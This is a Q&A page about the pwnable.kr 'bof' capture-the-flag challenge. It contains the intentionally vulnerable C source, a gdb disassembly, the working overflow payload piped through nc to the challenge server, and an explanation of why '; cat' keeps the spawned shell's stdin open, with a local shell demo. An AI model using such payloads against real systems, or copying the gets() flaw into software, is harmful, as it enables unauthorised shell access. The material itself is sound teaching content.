Why use cat to open interactive shell?

(Asking again without the download link)

Problem Description

Nana told me that buffer overflow is one of the most common software vulnerabilities. Is that true?

bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
        char overflowme[32];
        printf("overflow me : ");
        gets(overflowme);       // smash me!
        if(key == 0xcafebabe){
                system("/bin/sh");
        }
        else{
                printf("Nah..\n");
        }
}
int main(int argc, char* argv[]){
        func(0xdeadbeef);
        return 0;
}

bof

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000068a <+0>: push   %ebp
   0x0000068b <+1>: mov    %esp,%ebp
   0x0000068d <+3>: and    $0xfffffff0,%esp
   0x00000690 <+6>: sub    $0x10,%esp
   0x00000693 <+9>: movl   $0xdeadbeef,(%esp)
   0x0000069a <+16>:    call   0x62c <func>
   0x0000069f <+21>:    mov    $0x0,%eax
   0x000006a4 <+26>:    leave  
   0x000006a5 <+27>:    ret    
End of assembler dump.
(gdb) disassemble func
Dump of assembler code for function func:
   0x0000062c <+0>: push   %ebp
   0x0000062d <+1>: mov    %esp,%ebp
   0x0000062f <+3>: sub    $0x48,%esp
   0x00000632 <+6>: mov    %gs:0x14,%eax
   0x00000638 <+12>:    mov    %eax,-0xc(%ebp)
   0x0000063b <+15>:    xor    %eax,%eax
   0x0000063d <+17>:    movl   $0x78c,(%esp)
   0x00000644 <+24>:    call   0x645 <func+25>
   0x00000649 <+29>:    lea    -0x2c(%ebp),%eax
   0x0000064c <+32>:    mov    %eax,(%esp)
   0x0000064f <+35>:    call   0x650 <func+36>
   0x00000654 <+40>:    cmpl   $0xcafebabe,0x8(%ebp)
   0x0000065b <+47>:    jne    0x66b <func+63>
   0x0000065d <+49>:    movl   $0x79b,(%esp)
   0x00000664 <+56>:    call   0x665 <func+57>
   0x00000669 <+61>:    jmp    0x677 <func+75>
   0x0000066b <+63>:    movl   $0x7a3,(%esp)
   0x00000672 <+70>:    call   0x673 <func+71>
   0x00000677 <+75>:    mov    -0xc(%ebp),%eax
   0x0000067a <+78>:    xor    %gs:0x14,%eax
   0x00000681 <+85>:    je     0x688 <func+92>
   0x00000683 <+87>:    call   0x684 <func+88>
   0x00000688 <+92>:    leave  
   0x00000689 <+93>:    ret    
End of assembler dump.

Solution

https://0xrick.github.io/pwn/bof/

I understand that we have to supply 52 trash characters and cafebabe to overflow the buffer. But when I only pass that as input, I don't get an interactive shell. It's only when I pass in the cat command as well. Why is cat necessary?

---EDIT---

I forgot to mention that this is running on the server and I connect to it using nc pwnable.kr 9000. I pass in the input as python -c 'print("A"*52 + "\xbe\xba\xfe\xca")' | nc pwnable.kr 9000. The correct answer is said to be (python -c 'print("A"*52 + "\xbe\xba\xfe\xca")'; cat) | nc pwnable.kr 9000

c
bash
terminal
ctf
pwntools
asked on Stack Overflow Oct 27, 2020 by luke.lcim • edited Oct 28, 2020 by Peter Cordes
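The piece the question is circling is what system("/bin/sh") inherits. The spawned shell reads its commands from the bof process's stdin, which nc has wired to the socket, which on your side is the pipe from python. Once python has printed the payload it exits, the write end of the pipe closes, nc sees EOF on its stdin and closes its side of the connection, and the remote /bin/sh gets EOF on its very first read and exits before you can type anything. Wrapping the producer as (python ...; cat) runs both in one subshell that owns the pipe: after python finishes, cat keeps the pipe open and forwards your keystrokes to nc, so the remote shell keeps reading. The 52-byte count itself comes straight from the disassembly: overflowme lives at -0x2c(%ebp) and key at 0x8(%ebp), so 0x2c + 8 = 52 bytes of filler puts the next four bytes on top of key. Those 52 bytes also trample the stack canary at -0xc(%ebp), but the cmpl at <+40> and the system() call run before the canary check at <+75>, so the shell is already running when the stack protector would abort.

The script below is an added example, not code from the question, from pwnable.kr or from the linked write-up. It is a local stand-in for the bof service: fake_bof reads one line the way gets() does and then runs /bin/sh on the same stdin, which is what system("/bin/sh") inherits. A hypothetical text marker "CAFEBABE" at the end of the line plays the role of the 4-byte key so the demo stays ASCII. The two non-interactive runs show the payload-only case (the shell gets EOF at once and runs nothing) and the case where more input follows the payload (the shell executes it), which is exactly what cat provides from your terminal in the real attack.

```shell
#!/bin/sh
# Added example (not from the original question or from pwnable.kr): a local
# stand-in for the bof service that shows why the spawned shell needs its
# stdin kept open. The real binary compares a 4-byte key; here a hypothetical
# text marker "CAFEBABE" at the end of the input line plays that role.

# fake_bof reads one line, like gets() in bof.c, and then runs /bin/sh on the
# SAME stdin the service itself was given, which is what system("/bin/sh")
# inherits. Whatever is still unread on that stdin becomes the shell's script.
fake_bof() {
    IFS= read -r line || return 1
    case "$line" in
        *CAFEBABE) /bin/sh ;;
        *) echo "Nah.."; return 1 ;;
    esac
}

# 52 filler bytes, as in the question: buffer at -0x2c(%ebp) plus 4 bytes of
# saved ebp plus 4 bytes of return address reaches key at 0x8(%ebp).
PAD=$(printf '%52s' '' | tr ' ' 'A')
PAYLOAD="${PAD}CAFEBABE"

# A wrong key never reaches the shell: prints "Nah.." and fails.
wrong_key() {
    printf 'AAAA\n' | fake_bof
}

# Payload alone: the writer closes the pipe right after the payload, so the
# spawned /bin/sh sees EOF on its first read and exits. Nothing gets executed,
# which is what the question observes without cat.
payload_only() {
    printf '%s\n' "$PAYLOAD" | fake_bof
}

# What "; cat" achieves: the same pipe stays open after the payload and later
# input reaches the spawned shell. A second printf stands in for the keystrokes
# cat would forward, so this run is non-interactive and prints "got shell".
payload_then_commands() {
    { printf '%s\n' "$PAYLOAD"; printf 'echo got shell\n'; } | fake_bof
}

# The interactive form, in the shape of the accepted answer. cat blocks on the
# terminal until Ctrl-D, which keeps the shell's stdin open; type "id" etc.
interactive() {
    { printf '%s\n' "$PAYLOAD"; cat; } | fake_bof
}
```

Run interactive in a terminal to see the same behaviour as (python ...; cat) | nc pwnable.kr 9000. One caveat unrelated to cat: the payload line in the question only emits the raw bytes \xbe\xba\xfe\xca under Python 2; Python 3's print writes the UTF-8 encoding of those code points, so there you need sys.stdout.buffer.write(b"A"*52 + b"\xbe\xba\xfe\xca" + b"\n") instead.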

0 Answers

Nobody has answered this question yet.


User contributions licensed under CC BY-SA 3.0